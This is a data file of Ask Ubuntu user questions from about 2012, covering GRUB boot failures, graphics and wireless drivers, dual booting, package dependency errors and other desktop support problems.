234011	tor browser bundle 's version of firefox [ tor browser ] is recognized as the main firefox installation [ ubuntu 12.04 ]	whenever i run the start-tor-browser script to run tor-browser-bundle , the unity3d launcher stacks it with the firefox shortcut i have on there as if it 's another window of firefox , unlike before when unity3d launched it with a separate icon and place in the launcher . this problem started since i upgraded unity and firefox to the latest version . also , once ( after this problem had started ) i started tor-browser after i had firefox open , the page on torproject.org that tests if i have the browser configured for tor or not [ which is the homepage of the tor-browser-bundle ] reported that the browser was n't configured to be used with tor . how can i solve the problem ? that is , how can i fix the isuue of my system not recognizing the tor-browser as a separate app instead of firefox ? should i downgrade firefox/unity ? i use the latest tor obfsproxy browser bundle [ linux-i686-2.4.6-alpha-2-dev-en-us ] and i 'm on ubuntu 12.04
234013	how do i get rid of the unity dash in gnome classic ?	i tried to enable compiz features like wobbly windows and desktop cube , but doing so compiz crashed . after it restarted dash was started as well . i logged of and back onto my gnome classic environment , but the dash still starts . how can i get rid of the dash again so i can use gnome classic as before ?
234017	how do i get past a 'frozen ' terminal with a sudo password prompt ?	when running the terminal and asked for password the terminal freezes - can not type in or paste . what is the fix ? [ sudo ] password for david : and there i am stuck
234018	how to resize a luks partition by moving its start ?	i have a luks partition ( sdb2 ) on a drive which previously contained another partition ( sdb1 ) . now that i deleted sdb1 , i want sdb2 to use this space , too . all tutorials i could find seem to depend on lvm but i have no lvm setup . resizing a partition by moving its end sector instead of the start sector also seems easier but this is not the case here . any suggestions on how to accomplish this without moving the data and creating the partition from scratch ?
234020	how can i repair my raided system if i have recently upgraded ubuntu and the system starts now with `` grub rescue '' ?	my question is as stated in the title . i tried to find the constituents of grub at different folders as described elsewhere and i found the folder but when i tried the insmod linux command , the message was : the symbol 'grub_mm_base ' not found .
234022	problem installing skype on ubuntu 11.10	the software is present in the software center but after giving the `` install '' command , this message appears- to install skype , the following programs must be removed embedded gnu c library : binaries libc-bin the laptop has a 64 bit architechture
234028	are the source code of commercial version of open source software encrypted or hidden from being manipuated	commercial version of open source softwares are the main source of revenue for canonical , red head team , oracle [ for mysql ] , etc . so my question is do all these source codes hidden or encrypted from being manipulated , otherwise their will be no way of generating revenue for all these open source teams .
234038	what is syslog and how can i tackle problems with syslog	when i browsed through many linux forums , many ubuntu geeks solve issue using 'syslog ' . they analyze it , and post the answer . can anyone give me an idea about it ?
234041	/var/www permission problem	i 'm fairly new to ubuntu , and linux in particular . i want to use ubuntu for web development mostly , so i went ahead and installed lamp manually using this guide . everything works good . apache , php , mysql are all working perfectly fine , but there 's this permission issue . my files are going to be in /var/www , but i do n't have permissions to this directory . how would i make it so that i have the permissions to edit , view ( also in browser ) , delete , and create files in this directory ? note that i am not hosting a server , so security is not an issue . i will be managing my project locally .
234042	how do i configure 'natural scrolling ' with an apple magic mouse ?	has anyone managed to make natural scrolling work on ubuntu 12.10 ? and with make work i mean to find a setup working for all the applications and not something based on xmodmap which seems to be considered more an hack than a clean solution and in addition it does n't enable natural scrolling on nautilus . i am asking that because the workaround i found to enable it with magic trackpads ( i.e . tweak the setting synaptic scrolling distance using xinput ) does n't work with magic mouses because such devices seem not to make use of the synaptic driver . can you confirm that ? the following is the output of the command : xinput list-props 'apple magic mouse' device 'apple magic mouse ' : device enabled ( 126 ) : 1 coordinate transformation matrix ( 128 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 247 ) : 0 device accel constant deceleration ( 248 ) : 5.000000 device accel adaptive deceleration ( 249 ) : 1.000000 device accel velocity scaling ( 250 ) : 5.000000 device product id ( 243 ) : 1452 , 781 device node ( 244 ) : `` /dev/input/event16 '' evdev axis inversion ( 251 ) : 0 , 0 evdev axes swap ( 253 ) : 0 axis labels ( 254 ) : `` rel x '' ( 136 ) , `` rel y '' ( 137 ) , `` rel horiz wheel '' ( 375 ) , `` rel vert wheel '' ( 376 ) button labels ( 255 ) : `` button left '' ( 129 ) , `` button middle '' ( 130 ) , `` button right '' ( 131 ) , `` button wheel up '' ( 132 ) , `` button wheel down '' ( 133 ) , `` button horiz wheel left '' ( 134 ) , `` button horiz wheel right '' ( 135 ) evdev middle button emulation ( 256 ) : 0 evdev middle button timeout ( 257 ) : 50 evdev third button emulation ( 258 ) : 0 evdev third button emulation timeout ( 259 ) : 1000 evdev third button emulation button ( 260 ) : 3 evdev third button emulation threshold ( 261 ) : 20 evdev wheel emulation ( 262 ) : 0 evdev wheel emulation axes ( 263 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 264 ) : 10 evdev wheel emulation timeout ( 265 ) : 300 evdev wheel emulation button ( 266 ) : 4 evdev drag lock buttons ( 267 ) : 0
234045	upgrading to win 8 on a computer with windows 7 and ubuntu 12.04	i am using ubuntu 12.04 and windows 7 on my laptop , where i had installed ubuntu alongside windows . now , i would like to , if i can , upgrade to windows 8 without any formatting . how would that affect the booting process ? would it cause any problems with ubuntu 12.04 ?
234047	how do i get a broadcom bcm43225 wireless card working ?	i updated my 12.04 today and it broke my wireless connection on acer aspire 5942g . isa @ ubuntu : iwconfig lo no wireless extensions . eth0 no wireless extensions . isa @ ubuntu : lspci|grep network 03:00.0 network controller : broadcom corporation bcm43225 802.11b/g/n ( rev 01 ) can someone help me please ?
234058	how to finish setting up to boot from liveusb ?	katies-imac : ~ katiebaer $ sudo dd if=/users/katiebaer/downloads/ubuntu-12.04.1-desktop-i386.dmg of=/dev/rdisk4 bs=1m warning : improper use of the sudo command could lead to data loss or the deletion of important system files . please double-check your typing when using sudo . type `` man sudo '' for more information . to proceed , enter your password , or type ctrl-c to abort . password : i 'm hoping someone knows what this is and there is a simple solution .
234061	oracle java javac runtime error	i have been trying to install oracle java 7 on ubuntu 11.04 . i was following the instructions given here once i followed all the steps ( to the letter ) , i tried running java -version which gave the expected output . but running javac -version did not give the expected output . instead i get the following error : error : could not find libjava.so error : could not find java se runtime environment the environment variable path contains both /usr/local/java/jre/bin and /usr/local/java/jdk/bin , ld_library_path points to /usr/local/lib which contains libjava.so which is currently owned by the user who i am running javac as . in addition , java_home points to the jdk folder . inspite of all this , javac is unable to find the libjava.so file . there are multiple solutions online but none seem to work for me . even a direct run /usr/locale/java/jdk/bin/javac -version results in the same error . any help is hugely appreciated . thanks
234062	ubuntu 12.10 mp3 mpeg support	why does ubuntu 12.10 not support playing mp3 audio files and mpeg video right out of the iso ? these formats have been around for decades now and i find it strange that after i installed 12.10 i could not play an mp3 audio file or an mpeg2 video file . why should i have to install something else just to get this function , this should be there as a minimum to be considered an os in 2012 ? just wondering if i am missing something here or not . paul
234063	boot time is more than one minute with ext3 fs recovery everytime	it takes more than a minute for ubuntu to boot up on my new laptop . i have windows 7 and ubuntu 12.10 installed using wubi . from dmesg , i see the following : [ 2.934384 ] ext3-fs ( loop0 ) : recovery required on readonly filesystem [ 2.934387 ] ext3-fs ( loop0 ) : write access will be enabled during recovery [ 23.804784 ] kjournald starting . commit interval 5 seconds [ 23.871524 ] ext3-fs ( loop0 ) : recovery complete [ 23.871526 ] ext3-fs ( loop0 ) : mounted filesystem with ordered data mode [ 45.069369 ] adding 262140k swap on /host/ubuntu/disks/swap.disk . priority : -1 extents:1 across:262140k note the big time gap between the entries . you might ask whether i put my computer to a unclean shutdown because of the filesystem recovery , but i just shut it down gracefully using the system menu . how can i improve the boot time ?
234070	installing repos and debs from cd	i 'm a ubuntu user from 2009 and i have loved every bit of it . if it was n't for dreamweaver and photoshop , i 'd only use ubuntu ! i have an ubuntu desktop which i want to make a dns , dhcp , webserver ( lampp ) and ldap ( may be ) . i do n't want the ubuntu server with no gui , i just do n't like it . love the gui ( habitual of it ) . i have ubuntu server disk of the same version 12.04 lts and want to install above mentioned stuff from that as i have a very limited bandwidth . please tell me if there is anyway to do that . i have no problem with terminal usage , but i 'm no expert at it ! awaiting all you replies ! ! < extra info > the server will be an offline data entry server software portal with php apps for intranet . hw : amd athalon x2 2.4ghz 1 gb ram ddr2 320 gb sata hdd
234071	unable to install virtualbox 4.2 on ubuntu 12.10	i am trying to install virualbox 4.2 on ubuntu 12.10 but when this is the error i get : the following packages have unmet dependencies : virtualbox-4.2 : depends : libqt4-opengl ( > = 4:4.7.2 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . and if i try to run the command for dependencies , i get the message that its already installed . i have 64-bit ubuntu and trying to install 64-bit virtualbox the issue seems to be with the linux-headers as i have 3.5.0.21 where as its asking for 3.5.0.17
234074	installing ubuntu , dual boot	i am trying to install ubuntu , having looked at it on cd , without any success . first attempt at install did n't give me any options where to install it , and it wiped out one of my windows xp disks and had to reformat ( despite choosing install alongside windows ) . second attempt , using manual install , offered me about 30 choices involving all sorts of raid set-ups that i could n't understand , and i could not figure out where the disk i have ready for ubuntu was actually listed . third attempt involved wupi , which put it where i want it , but under windows . i do not get a choice of operating system at boot - it just goes into windows , so i ca n't access it . the boot.ini file has clearly not been altered correctly . all i want to do is install it onto my disk h , which is cleared and ready for use just by ubuntu , and have a dual boot system , without ubuntu dependent on windows . preferably with boot menu choice on boot up , but i can manually select disk h to boot from if need be . i do not need or want to partition the physical disk - it can all go to ubuntu . this should be simple - but i have n't yet found any directions as to how to achieve it .
234076	ladspa-foo-plugins â where are the plugins located ?	i installed the plugins mentioned ( sudo apt-get install ladspa-foo-plugins ) , but audacity does n't find them . they are not located in /usr/lib/ladspa . how can i find out where installed files from a package are located ?
234077	cubemen is not starting	i bought cubemen from steam today and installed it , but when i click play , nothing happens . it says preparing to start and then nothing . i run ubuntu 12.10 please help me .
234080	pencil and pencil project package naming conflict	i have installaed pencil 2d animation software . which you can see at http : //www.pencil-animation.org/ and i want to install the pencil project wireframing app which is totally different . i want to know how to install the application without naming conflict ? as the previous name directory in usr/share is used by pencil animation , i ca n't install the pencil wireframing at the same time , any solutions ?
234081	how to boot ubuntu without a monitor plugged in ?	how to boot an ubuntu 12.10 without monitor/keyboard/mouse i 'm using as server and connect to it through remote desktop viewer no problem with 12.04 but after the upgrade i receive the message low graphic or monitor not detected i have try to create a /etc/x11/xorg.conf with multiple proposed solution from internet without sucess .
234088	how to make grub2 detect and boot ubuntu on a raid 1 ?	grub 2 is unable to detect /dev/md1 which is a raid 1 drive on my computer . when i press c in grub menu and run ls i get a list of all the drives but do n't see md1 for booting ubuntu which is on md1_p1 . this is the config i 'm using in the grub2 40_custom file . menuentry `` ubuntu 12.10 uuid '' { insmod ext2 insmod mdraid set root= ' ( md1,1 ) ' search -- no-floppy -- fs-uuid -- set=root 23451bea-fd08-cff7-9289-9f9aa51f8599 linux /boot/vmlinuz-3.5.0-17-generic root=uuid=23451bea-fd08-cff7-9289-9f9aa51f8599 ro initrd /boot/initrd.img-3.5.0-17-generic } i 'm able to load linux installed on other partition but unable to start 12.10 which i 've just installed on a raid 1 ext4 fs .
234090	how to install ubuntu server amd64 12.0.4.1 in windows 2008 hyper-v ?	i would like to install ubuntu server 12.0.4.1 lts in windows server 2008 hyper-v . however when i run the ubuntu installation from the cdrom iso , i get stopped by the error `` your installation cd-rom could n't be mounted ... '' . i found some references to this problem maybe being a bug . i tried the following f6 parameters suggested by people experiencing this problem , but they did not work : -- ata_piix.prefer_ms_hyperv=0 -- reserve=0x1f0 , 0x8 i have been installing ubuntu server in hyper-v since ubuntu 8.0.4 lts without any `` cd-rom '' installation issues . i 'm not sure why version 12.0.4.1 no longer installs in hyper-v . does anyone know how to install ubuntu server 12.0.4.1 lts in windows server 2008 hyper-v ? updated : 17:00 est dec 29 , 2012 i was able to install ubuntu 12.0.4 using the mini.iso from the following archive . however , i do n't really consider this a solution because the procedure is technically not repeatable and i am not sure if i follow the same procedure a year from now i will get the same install or different versions . repeatability is important to me since i install additional software into the system after ubuntu is installed . http : //archive.ubuntu.com/ubuntu/dists/precise/main/installer-amd64/current/images/netboot/
234094	facebook font problem	i installed wine hq for ubuntu . and then ubuntu installed some windows fonts like arial and e.t.c . after restarting computer i saw that facebook font changed . how can i resolve it ?
234097	uninstall java not working ?	i am trying to uninstall java 1.7.0_10 on ubuntu 12.04 using the instructions from here-http : //akbarahmed.com/2012/06/24/uninstall-java-from-ubuntu-linux/ . after i complete the instructions , i check for java and it is still there . any ideas ?
234098	install windows 8 after ubuntu 12.10	it 's the first time i install ubuntu before windows and thats why i failed so much so i need your help . i have 64bit ubuntu 12.10 and i left some space to add windows 8 later . the time for windows came and i put the bootable usb stick to install it , but get stuck - choosing any partition , including ntfs one , return this message : windows can not be installed on this disk . the selected disk is of the gpt partition style . i 've googled it for some info , but all i understand is that i have partition table that windows does not like and support . one solution would be to backup entire data , install windows and then restore my ubuntu , but i think there should be easier way . there is my partition table : thanks in advance .
234099	ubuntu 12.10 ntfs on usb drive problems	i installed 12.10 a while ago , but i am now experiencing problems with usb devices . at first i had problems copying files to a flash disk . i was told that there is not enough space on the disk , but the amount of files amounted to a fraction of the capacity of the device . i formatted the flash drive with gparted and copied the files . then i ejected the device and the moment i pulled out the device i got an error message about not being able to write to the disk . at first i thought i pulled the disk to quickly , but repeating the exercise a few times discovered that this happened even when waiting ten minutes before removing the drive after ejecting it . if i re-insert the disk , i get an error message that the drive could not be mounted . since then i have had similar problems when writing files to an external hard drive . i 'm not getting the same problem on my other pc with ubuntu 11.10 . i 'm desperate at this stage as i ca n't write files to external device . ubuntu 12.10 keeps on corrupting the file system .
234102	what are the pros and cons with pm-powersave for saving power ?	i do n't know how much power my system consuming and my ups also behaves in a strange way . so i googled and stopped at ubuntu power management . installed powertop and everything is fine . as mentioned in wiki documentation if i use sudo pm-powersave true it will enter into low power mode , so because of doing like this i can save some power but is there any type of problem i am going to face ? bottom line , is there any disadvantage now or in future if i turn on low power mode ?
234105	how can i solve a 'reboot and select a proper boot device ' error after an installation from a live cd ?	i have installed ubuntu 12.04 from a live cd . ubuntu 12.04 is the only operating system on my pc . my boot settings in the bios are : boot device cd boot device hard drive . i installed ubuntu without any problems . but my system will not boot without my live cd . every time i try it says : reboot and select a proper boot device . what should i do ? i ran a boot repair and i have the url to paste here http : //paste.ubuntu.com/1476459/ .
234111	how to boot ubuntu from ssd drive which can not be selected as boot device ?	i have freshly installed ubuntu 12.10 ( 64 bits ) on an asus s405cm-wx117h laptop ( similar to this one ) which features a 24gb ssd drive and a regular 500gb hard drive . i placed the / ( ext4 ) root file system in the ssd drive and partitioned the regular hard drive with 10gb swap and the rest as ext4 for /home . it installed smoothly without errors , but when it restarted , i seem not to be able to boot ubuntu ( i have nothing else there ) . to verify the installation was successful , i checked it using a live ubuntu ( dvd ) and both hard drives are recognized and the files from the new system are there . the order of the disk as recognized in ubuntu is : sda = 500 gb sata hdd , sdb = 24gb ssd . would it help my boot issue if i would be able to make ubuntu swap the drive name assignments ? in the bios both hard drives are listed , yet i can only choose to use the regular hard drive as a boot device , for some reason i do n't understand . it simply does n't let me boot from the ssd drive . i know that if i would install ubuntu on the 500gb disk , it would probably boot just fine , but i want it in the ssd for obvious performance reasons . any idea on how i could fix this ?
234114	how can i install fonts in wine ?	i am using ubuntu 12.04 and i just installed wine . sudo add-apt-repository ppa : ubuntu-wine/ppa sudo apt-get update sudo apt-get install wine1.5 sudo apt-get install winetricks the installation was not fully successful because it gave me the error that fonts were not installed . without the fonts i cant open any program . i have tried to copy fonts from windows to /usr/share/fonts but there is no paste option . also i have googled and saw somewhere that you can install fonts via winetricks . if so , how does it work ? can i open winetricks ? how can i do the install ? regards
234117	running powerpoint slides from ubuntu terminal in windows 7 using virtualbox	does anybody know how i can run ms powerpoint slides from ubuntu terminal ( my host os ) in windows 7 ( my guest os ) - i think i should use .pps to run it automatically . what i 'm doing now is : vboxmanage -- nologo guestcontrol `` mywindows7 '' execute -- image `` c : \windows\system32\cmd.exe '' -- username my_username -- password my_password -- start `` opening file ... '' `` e : \my_presentation_slides.pps ''
234119	any way to make switching between discrete and integrated graphics from the bios work with proprietary drivers ?	what i would like to be able to do : i would like to be able to switch between my dedicated graphics card ( amd ) and integrated chip ( intel ) from the bios , that means : restart → bios : set to integrated intel enabled ( only ) → boot or restart → bios : set to discrete amd enabled ( only ) → boot this type of primitive switching works fine when running on open source drivers . however , as soon as i install fglrx , switching from amd to intel from the bios breaks the session and the system falls back to low-graphics mode on boot-up . what i did : fresh system , open source drivers with intel enabled switched to amd = no problemo ! switched to intel = no problemo ! ( the above repeated few times and tested for performance issues ) installed proprietary amd drivers per http : //www.unixmen.com/ubuntu-12-10-and-amd-catalyst-problem-solved/ ( ppa ) ⇒ working fine after restart ! switched to intel ⇒ broken configuration , i.e . system boots to 2d/fallback mode ! why do i need it ? first of all , it 's a matter of my curiosity . more importantly though , getting this thing to switch on amd proprietary would be huge for me . i was asking about amd/intel switching a while ago and while i got the answer , 1 ) it does n't work 2 ) i ca n't contact the author of the answer 3 ) i suspect the answer is overcomplicated . in summary i need help either with this question or with the old one linked above . system information : ubuntu 12.04 amd64 , installed clean lenovo thinkpad t500 intel gma 4500mhd / ati mobility radeon hd 3650
234128	issue updating sabnzbdplus package because of unmet dependency	i trying to do apt-get install , but nomatter what i do ( sudo apt-get -f install , sudo apt-get purge sabnzbdplus etc ) it just complains about this unmet dependency . edit : mads @ madsserver : ~ $ sudo apt-get remove sabnzbdplus-theme-smpl sabnzbdplus reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : sabnzbdplus-theme-classic : depends : sabnzbdplus ( = 0.7.6-0ubuntu1~jcfp1~precise ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . mads @ madsserver : ~ $ sudo apt-get remove sabnzbdplus-theme-classic sabnzbdplus reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : sabnzbdplus-theme-smpl : depends : sabnzbdplus ( = 0.7.6-0ubuntu1~jcfp1~precise ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
234133	ht omega eclaro sound card ( c-media cmi8788 ) wo n't load in ubuntu 12.10	disclaimer : i also posted this question at linuxquestions.org . i have mint 14 ( based on ubuntu 12.10 ) installed right now , but this problem exists with stock ubuntu 12.10 as well . if you insist , i can install straight ubuntu 12.10 for the purposes of troubleshooting . i have an ht omega eclaro sound card based on the c-media cmi8788 which is supported under alsa with the snd-oxygen module . the card is not loaded by alsa as a sound device either at boot time or by modprobing . relevant output of lspci 04:00.0 multimedia audio controller : c-media electronics inc cmi8788 [ oxygen hd audio ] output of cat /proc/asound/cards 0 [ nvidia ] : hda-intel - hda nvidia hda nvidia at 0xf6080000 irq 17 1 [ q9000 ] : usb-audio - quickcam pro 9000 logitech , inc. quickcam pro 9000 at usb-0000:00:1a.0-1.3.1 , high speed the snd-oxygen module is not loaded at boot ( not listed under lsmod ) . after i run sudo modprobe snd-oxygen the module loads but the device is still not accessible to alsamixer . snd_oxygen 20948 0 snd_oxygen_lib 41273 1 snd_oxygen snd_mpu401_uart 14169 1 snd_oxygen_lib some possibly relevant websites : crunchbang : [ solved ] soundcard eclaro not working ask ubuntu : in need of driver for c-media cmi8788 - i really do n't want to rip out alsa ask ubuntu : how can i enable my asus xonar dgx ( cmi8788 chipset ) sound card ?
234137	problem with wifi driver	i have a issue with wireless connection on asus x51l notebook . i am able to connect with using windows 7 with latency 1ms to my ap . but when i am using ubuntu 12.10 the latency is 480 and more ms and the signal intensity is very low even if the ap is in the same room . can you please help me ? i am using ubuntu 12.10 on 4 devices but i have this problem only on this asus . thanks for help
234139	is there a greeting card maker ?	is there any software for creating great greeting cards in ubuntu ? maybe the question has been asked before , but i did n't find scribus or gimp suitable . is there any specific application for creating greeting cards ?
234140	problem installing grub with dual boot win7 on raid	i use linux at work and am pretty happy setting up and installing to new machines in several configurations , however i have to admit , this time i 'm stumped ! i have a nice new pc with an ssd raid in place . it currently has windows 7 installed , and i was able to successfully install ubuntu ( 12.04 ) from a live usb . when i reached the end i had the error executing grub-install failed i finished the install without installing grub expecting to be able to do this seperately after , i did some googling and came across the following advice : create a temp folder , and link to the linux partition . run the following command `` sudo grub-install -- root-directory=/home/ubuntu/temp /dev/mapper/ [ partition here ] '' in my case : sudo grub-install -- root-directory=/home/ubuntu/temp /dev/mapper/pdc_ifegdfjd5 i get the following error : /usr/sbin/grub-probe : error : unknown filesystem . auto-detection of a filesystem of /dev/mapper/pdc_ifegdfjd5 failed . try with -- recheck . if the problem persists please report this together with the output of `` /usr/sbin /grub-probe -- device-map= '' /home/ubuntu/temp/boot/grub/device.map '' -- target=fs -v /home/ubuntu/temp/boot/grub '' to < bug-grub @ gnu.org > so i 've run with -- recheck and get the exact same error . i 'm not entire sure where to go from here , i 've some more googling , but not getting any positive result . the output of fdisk -l : device boot start end blocks id system /dev/mapper/pdc_ifegdfjd1 * 2048 206847 102400 7 hpfs/ntfs /exfat /dev/mapper/pdc_ifegdfjd2 206848 184526847 92160000 7 hpfs/ntfs/exfat /dev/mapper/pdc_ifegdfjd3 184527102 464843519 140158209 5 extended partition 3 does not start on physical sector boundary . /dev/mapper/pdc_ifegdfjd5 184527104 431427327 123450112 83 linux /dev/mapper/pdc_ifegdfjd6 431427584 464843519 16707968 82 linux swap / solaris can anyone point me in the correct direction ? many thanks , matt
234141	boot hangs after i have moved home partition	i have a dell inspiron with pre-installed ubuntu 11.10 . it has a huge root partition without swap , home etc . i have decided to repartition the system . since i did not want to delete dellutility and os partitions , i have resized the root ( sda3 ) partition to smaller and then i have created an extended partition ( sda4 ) with 3 logical partitions for home ( sda5 ) , storage ( sda6 ) and swap ( sda7 ) . i could modify fstab so after boot storage and swap are there and working . then i followed this description to move home from root to the logical partition . i could reboot after step 2 then i could successfully rsync home content , and modify fstab again . after step 5 i have rebooted but even the grub menu does not appear what was there before . i did not modify anything related to grub during these steps . the 512 bytes of mbr looks as before . booting from usb shows that there are no changes in /var/log at all . i have checked the uuids in fstab and they match the ids what blkid shows . i have moved /old_home back to /home and i have deleted all the new lines from fstab but the system still does not boot . what is wrong with my procedure ? as it is a new machine there is nothing important in home i just want to have a separate partition before i start using it .
234143	huawei e353 ( 3g dongle ) works in 12.04 32- bit but not in 64-bit ?	my huawei e353 ( saunalahti branded ) , works out of the box in ubuntu 12.04 32 bit ( tested on my desktop ) , but on my laptop with 64 bit ( can not install the 32 bit edition due to efi ) it is not recognized as a modem . lsusb in the 32 bit edition gives 12d1:1506 lsusb in the 64 bit edition gives 12d1:14fe i have tried various usb_modeswitch commands but i ca n't get it to work . any ideas ?
234145	does canonical provide paid support for individuals ?	does canonical provide paid support for individuals or is it only for multiple desktop/severer businesses ? if not for individuals , is paid support available anywhere ? thank you .
234148	the right way to install fglxr ( ati/amd drivers ) in 12.10 ?	i 've recently and after testing several distros moved back to ubuntu ( i loved debian , but ubuntu felt more complete ) . so the problem here is that i currently own an hp laptop ( 3315ep ) with an ati graphics card ( 5550m ) , which is available as a high performance card , paired with the included intel card and it should be able to switch between them if ( switchable graphics within the ccc ) . how do i install my graphics card and the available catalyst control centre in a fresh 12.10 install ? from what i 've read there are some compatibility issues with x , kernel , unity and the stable version of ati drivers ( hence the beta drivers availability ) , but since the posts are about 1 to 2 months old i do not know if that is the correct method any more ( the related kernels in such threads are not the most recent ) . i 've tried such methods , but after installing both the stable and the beta drivers from the ati website , unity breaks after logging in , and no window manager seems to work either , neither does fglxrinfo return any valid information . thank you for your time .
234153	external monitor recognized but getting `` no signal ''	i 'm running 12.10 dual booted with windows 7 ( nvidia optimus ) . i have no idea what might be wrong because : the monitor works on windows it worked on ubuntu for over a year and even now the splash screen shows up on the external monitor while ubuntu is booting the monitor is detected and shows up in the workspace switcher i connected it to another monitor through hdmi and it works fine it works fine through vga ( but for some reason it 's not as sharp ) changing the resolution did n't help changing cables did n't help here 's my xrandr output : screen 0 : minimum 320 x 200 , current 3286 x 1080 , maximum 8192 x 8192 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 293mm x 164mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected 1920x1080+1366+0 ( normal left inverted right x axis y axis ) 531mm x 299mm 1920x1080 60.0*+ 50.0 60.0 25.0 30.0 1600x1200 60.0 1680x1050 59.9 1680x945 60.0 1400x1050 74.9 59.9 1600x900 60.0 1280x1024 75.0 60.0 1440x900 75.0 59.9 1280x960 60.0 1366x768 59.8 1360x768 60.0 1280x800 74.9 59.9 1152x864 75.0 1280x768 74.9 60.0 1280x720 50.0 60.0 1024x768 75.1 70.1 60.0 1024x576 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 720x576 50.0 848x480 60.0 720x480 59.9 640x480 72.8 75.0 66.7 60.0 59.9 720x400 70.1 dp1 disconnected ( normal left inverted right x axis y axis )
234154	error : no such partition grub rescue	i had a windows xp on my 64gb ide ssd . i tried to install ubuntu 12.10 using wubi , bit it did not worked : i could choose ubuntu from the boot menu , but it did worked . then i installed ubuntu 12.10 from the bootable live usb version , i choose `` install alongside windows '' . after a successful installation message , i restarted the notebook and i got this error message : error : no such partition grub rescue things i tried without success : http : //opensource-sidh.blogspot.in/2011/06/recover-grub-live-ubuntu-cd.html ubuntusecureremix https : //sourceforge.net/projects/boot-repair-cd/files/ internet connection does not work ( i have only mobile internet access via a usb stick and it is not recognised by boot repair ) , so i can not provide any output . i tried to save it on the pendrive , but it is not visible ( or non-existent ) in the other notebook i use now ( windows xp ) . any help appreciated .
234155	ralink driver installed but still no wfi	i have install the ralink driver rt5390sta for my compaq cq56 laptop . but even after installing the drive , it does n't show up at all . the driver install successfully . how do i make the wireless card ( chipset ) communicate with ubuntu .
234159	dvi monitor and hdmi tv on intel hd4000	some please help ! i 've been working at this for several days ( arg ! ) asus p8h77-i ( dvi , hdmi , vga ) and an i7-3770 ( integrated hd4000 graphics ) . dvi connected to a 1920x1080 monitor hdmi connected to a 1280x720 panasonic plasma tv fresh 12.04 install ; no xorg.conf if i unplug the monitor and reset x , the tv works fine as a primary display . as soon as i plug in the monitor , the tv goes blank ( black screen ) and the monitor switches on . if i go to `` system settings > display '' , i see that both screens are recognized , activated , and set as the proper resolutions . how can i get both screens to display at the same time ? i 'm trying to get twin view ( as opposed to mirrored , but at this point i 'd be happy with either as long as they both display ) . any advice would be gretaly appreciated . thanks .
234164	copy ubuntu with my personalizations	i have just installed ubuntu on my friends laptop . i will install ubuntu on my own machine next week , but i do n't want to do that . i have not only installed ubuntu , but also installed a lot of applications and configure a lot of them ( like pidgin , firefox , etc. ) . is it possible to somehow copy the already installed ubuntu into a another machine ?
234165	custom environment variable script	i installed rootv5.34.03 and it comes with a script to set the necessary environment variables . the installation guide tells me to just run the script but that only sets the environment for that shell . i would like to have the environment set system wide . i found that running the script from bash_completion works as far as i can tell . is this an acceptable solution , is there a better way ? i am using ubuntu 12.10 64-bit . also the script sets ld_library_path so i ca n't place it in many common locations or else ld_library_path gets erased .
234170	how to make a normal installation on windows xp ?	i do n't know if my question makes sense , but i am asking anyway if there is actually an answer . from what i have read , a regular install performs better when compared to wubi install . my question is , is it possible to make a regular install on a windows xp system , without using wubi . if so , what is the procedure to do this ?
234174	what is `` safe '' on linux ?	i 'm not a power user ; i do n't get too much time to learn about command lines . i 'm using ubuntu to browse the web , play the steam for linux beta , and do some image editing . i recently installed avast ! , but in order for it to function properly , i was told that i needed to edit /etc/sysctl.conf and add kernel.shmmax = 128000000 . so i 'm wondering : how do i know if a command is safe ? sure it fixes my problem , but what else does it do ? if a user with more than 5k rep uses it , does it mean that any command he gives you is trustworthy ? i 'm not gon na enter every command i see . i 'd just like to know if a simple command ( as the one said before ) could open a window to an invasion or any other vulnerability . i did n't find anything on google about that command , so is it safe ? i 'm too nervous about getting hacked . on windows i had kaspersky internet security , now i 'm alone with avast and clamtk ( both only scan by demand ) and bitdefender ( bootable cd ) . my games and software are all genuine , but i torrent legal content . i just want some additional reassuring . thanks .
234176	how to demux an mp4 file	i have an mp4 file , and i want to separate the video and audio to separate files . i know the audio file in the mp4 file is aac . how do i losslessly extract the audio file ? i think i am supposed to use avconv ?
234179	howto use webb apps feature	ok , i 've just decided to try ubuntu distro . burned a bootable usb and started playing . after watching `` top 10 features '' video i 've though webapps feature is awesome - if i could make it work i could get some damn cool results in my workshop ( getting gmail , fb , twitter tabs or even hopefully basecamp would speed my work up ) . sadly i ca n't access this feature . on the video i can see a sort of prompt near address bar that apears when the guy enters twitter . on my computer i got nothing . any idea howto make it work ?
234186	kde rounded borders when maximized	in kde ( 4.9 or project neon ) , how do i keep rounded borders for even maximized windows ?
234196	trying to setup a cannon image class mf4880dw printer	so for christmas my mother got a cannon image class mf4880dw printer . i have ubuntu 12.03 setup on her laptop . i 'm trying to get this printer to work via wifi . i had figured that network printers would n't require drivers.. i see that on cannon 's website there are not any drivers . is there any other way of using this printer or do i need drivers ?
234201	unusable desktop in ubuntu 12.10	i am using ubuntu qq with gnome-session-fallback for a long time now . i replaced nautilus with thunar but when i restarted the laptop , the panel works , but i cant right click or change the desktop background .
234202	how do i install and use apache ?	i have downloaded ubuntu desktop . i want to create a web server to host test web sites to show my potential clients . any suggestions , tips , or good direction for me ? my plan is to download apache and just work through it . i would greatly appreciate anything that would help me get up and running .
